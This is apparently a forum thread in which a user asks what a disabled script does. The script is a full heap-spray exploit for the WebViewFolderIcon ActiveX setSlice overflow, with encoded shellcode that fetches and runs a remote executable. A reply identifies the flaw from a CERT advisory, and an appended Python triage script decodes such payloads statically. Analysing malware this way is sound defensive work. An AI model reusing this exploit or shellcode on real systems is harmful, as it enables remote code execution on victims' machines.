What is this script doing?

V S Rawat

Could someone please give me some idea what this script is doing?

It might be some malicious script that might have been used to spread a
virus or to hack usernames/passwords, hence it has been ### so that it
can't be run by default.

Thanks.

<!-- <html>
###<body>
###<script>
### var heapSprayToAddress = 0x05050505;
### var shellcode = unescape("%u9090"+"%u9090"+
###"%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320" +
###"%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2" +
###"%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b" +
###"%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b" +
###"%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a" +
###"%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b" +
###"%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40" +
###"%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83" +
###"%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8" +
###"%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52" +
###"%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff" +
###"%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40" +
###"%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a" +
###"%u6d2f%u686f%u6973%u776e%u6265%u6973%u6574%u632e" +
###"%u2e6f%u6b75%u622f%u6e69%u3264%u652e%u6578%u0000");
###var heapBlockSize = 0x400000;
###var payLoadSize = shellcode.length * 2;
###var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
###var spraySlide = unescape("%u0505%u0505");
###spraySlide = getSpraySlide(spraySlide,spraySlideSize);
###heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
###memory = new Array();
###
###for (i=0;i<heapBlocks;i++)
###{
### memory = spraySlide + shellcode;
###}
###for ( i = 0 ; i < 128 ; i++)
###{
### try
### {
### var tar = new
ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
### tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
### }
### catch(e){}
###}
###
###function getSpraySlide(spraySlide, spraySlideSize)
###{
### while (spraySlide.length*2<spraySlideSize)
### {
### spraySlide += spraySlide;
### }
### spraySlide = spraySlide.substring(0,spraySlideSize/2);
### return spraySlide;
###}
###
###</script>
###</body>
###</html>
### -->
--
 
denisb

V S Rawat said:
Could someone please give me some idea what this script is doing?
[snip]

### var tar = new
ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
### tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );

"The Microsoft Windows WebViewFolderIcon ActiveX control contains an
integer overflow vulnerability. This may allow a remote, unauthenticated
attacker to execute arbitrary code on a vulnerable system."

in <http://www.kb.cert.org/vuls/id/753044>
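
A static triage pass over a page like the one posted above, as an added example that is not part of the thread: it decodes the %u escapes without executing anything, lists the readable strings inside the decoded blob, and flags the ActiveX ProgID and setSlice call quoted above. The sample input is constructed, and the string-doubling check is a generic heuristic assumed here.

```python
import re

# ProgID and method name come from the script quoted in this thread;
# the remaining patterns are generic heap-spray heuristics (assumptions).
PROGID = "WebViewFolderIcon.WebViewFolderIcon.1"

def decode_percent_u(source):
    """Collect every %uXXXX escape and lay the 16-bit words out
    little-endian, the byte order they have in memory after unescape()."""
    words = re.findall(r"%u([0-9a-fA-F]{4})", source)
    return b"".join(int(w, 16).to_bytes(2, "little") for w in words)

def printable_strings(blob, min_len=5):
    """Return runs of printable ASCII, like strings(1) on the decoded blob."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]

def triage(source):
    """Static checks only: the script is read as text and never executed."""
    blob = decode_percent_u(source)
    return {
        "escaped_bytes": len(blob),
        "strings": printable_strings(blob),
        "activex_progid": PROGID.lower() in source.lower(),
        "setslice_call": re.search(r"\.setSlice\s*\(", source) is not None,
        "string_doubling": re.search(r"\b(\w+)\s*\+=\s*\1\b", source) is not None,
    }

# Constructed sample, not the payload from the thread: the escapes encode
# only a placeholder string, and the lines keep the "###" prefix.
SAMPLE = r"""
### var sc = unescape("%u9090%u9090" +
###"%u7468%u7074%u2f3a%u652f%u6178%u706d" +
###"%u656c%u692e%u766e%u6c61%u6469%u782f%u0000");
### var slide = unescape("%u0505%u0505");
### while (slide.length*2 < 0x1000) { slide += slide; }
### var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
### tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505, 0x05050505);
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Strings recovered this way (URLs, DLL names, file paths) are usually the quickest indicators to pull from such a page before any deeper analysis.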
 
